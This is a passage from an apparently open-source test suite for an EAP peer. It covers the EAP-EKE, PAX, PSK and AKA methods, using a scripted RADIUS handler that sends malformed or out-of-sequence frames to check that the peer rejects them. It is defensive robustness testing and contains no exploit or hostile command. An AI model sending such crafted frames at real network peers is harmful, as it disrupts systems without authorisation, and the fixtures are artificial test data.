            return eke_id_req(ctx, (1, 1, 1, 1))
        idx += 1
        if ctx['num'] == idx:
            return eke_commit_zero(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB4L8L5L5L",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM,
                               0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        return None

    srv = start_radius_server(eke_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        for i in range(0, 14):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="EKE", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # Attempts from index 2 onwards end with a scripted EAP-Failure.
            if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
# EAP-PAX op-codes.
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
# EAP-PAX flags bits (More Fragments, Certificate Enabled, ADE Included).
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
# EAP-PAX MAC identifiers.
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_HMAC_SHA256_128 = 0x02
# EAP-PAX Diffie-Hellman group identifiers.
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
# EAP-PAX public key identifiers.
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
# EAP-PAX ADE type identifiers.
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
    """EAP-PAX protocol tests

    Drives the EAP-PAX peer implementation through a scripted sequence of
    malformed or deliberately inconsistent server messages (one case per
    connection attempt) and verifies the peer survives each of them.
    """
    # Build a well-formed PAX STD-1 request with a precomputed ICV so the
    # handler can restart the exchange from a known-good state.
    def pax_std_1(ctx):
        logger.info("Test: STD-1")
        ctx['id'] = 10
        return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 5 + 2 + 32 + 16,
                           EAP_TYPE_PAX,
                           EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                           EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                           32, 0, 0, 0, 0, 0, 0, 0, 0,
                           0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
                           0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
    # RADIUS-side EAP handler: ctx['num'] counts connection attempts and idx
    # selects which scripted test frame to return for the current attempt.
    def pax_handler(ctx, req):
        logger.info("pax_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PAX)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Minimum length payload")
            return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 16,
                               EAP_TYPE_PAX,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported MAC ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
                               EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported DH Group ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               255, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported Public Key ID")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, 255,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: More fragments")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ICV")
            return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ICV in short frame")
            return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 12,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - unsupported op_code")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
                               0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - CE flag in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
                               0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - too short STD-1 payload")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
                               0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - incorrect A length in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               0, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
                               0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Correct ICV - extra data in STD-1")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 1 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               1,
                               0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
                               0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected STD-1")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MAC ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: DH Group ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_2048_MODP,
                               EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Public Key ID changed during session")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE,
                               EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
                               0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected STD-3")
            ctx['id'] = 10
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
                               0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
        idx += 1
        if ctx['num'] == idx:
            return pax_std_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            # TODO: MAC calculation; for now, this gets dropped due to incorrect
            # ICV
            logger.info("Test: STD-3 with CE flag")
            return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 5 + 2 + 32 + 16,
                               EAP_TYPE_PAX,
                               EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
                               EAP_PAX_MAC_HMAC_SHA1_128,
                               EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
                               32, 0, 0, 0, 0, 0, 0, 0, 0,
                               0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
                               0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
        idx += 1
        # After the scripted cases: alternate between a minimal default
        # request and EAP-Failure based on the parity of the attempt counter.
        if ctx['num'] & 0x1 == idx & 0x1:
            logger.info("Test: Default request")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PAX)
        else:
            logger.info("Test: Default EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(pax_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler case.
        for i in range(0, 18):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PAX", identity="user",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            logger.info("Waiting for EAP method to start")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].dump_monitor()
        # Local (peer-side) validation failures that never reach the server.
        logger.info("Too short password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PAX", identity="user",
                       password_hex="0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
        logger.info("No password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PAX", identity="user",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_psk(dev, apdev):
    """EAP-PSK protocol tests

    Feeds the EAP-PSK peer a scripted sequence of malformed or
    out-of-sequence server messages (one case per connection attempt) and
    verifies the peer handles each of them without misbehaving.
    """
    # RADIUS-side EAP handler: ctx['num'] counts connection attempts and idx
    # selects which scripted test frame to return for the current attempt.
    def psk_handler(ctx, req):
        logger.info("psk_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Non-zero T in first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short third message")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_PSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Incorrect T in third message")
            return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing PCHANNEL in third message")
            return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16,
                               EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            # Fixed typo in log message ("Invalic" -> "Invalid")
            logger.info("Test: Invalid MAC_S in third message")
            return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16 + 16 + 21,
                               EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
                               0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid first message")
            return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 16,
                               EAP_TYPE_PSK, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        return None
    srv = start_radius_server(psk_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # One connection attempt per scripted handler case.
        for i in range(0, 6):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PSK", identity="user",
                           password_hex="0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
        # Local (peer-side) validation failure: PSK must be 16 octets.
        logger.info("Test: Invalid PSK length")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PSK", identity="user",
                       password_hex="0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                               timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
# EAP-SIM Subtype values (RFC 4186)
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14
# EAP-AKA Subtype values (RFC 4187)
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14
# EAP-SIM/AKA attribute (AT_*) type values; values >= 128 are "skippable"
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
    """EAP-AKA protocol tests

    Drives the EAP-AKA peer through a long scripted sequence of malformed
    messages, unexpected subtypes, invalid attribute lengths, and
    notification corner cases (one case per connection attempt) and
    verifies the peer rejects each of them cleanly.
    """
    # RADIUS-side EAP handler: ctx['num'] counts connection attempts and idx
    # selects which scripted test frame to return for the current attempt.
    def aka_handler(ctx, req):
        logger.info("aka_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_AKA)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, 255, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Client Error")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short attribute header")
            return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated attribute")
            return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short attribute data")
            return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            # Fixed typo in log message ("unrecognzized" -> "unrecognized")
            logger.info("Test: Skippable/non-skippable unrecognized attribute")
            return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 10,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               255, 1, 0, 127, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request without ID type")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request ANY_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_ANY_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
                               EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
            return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
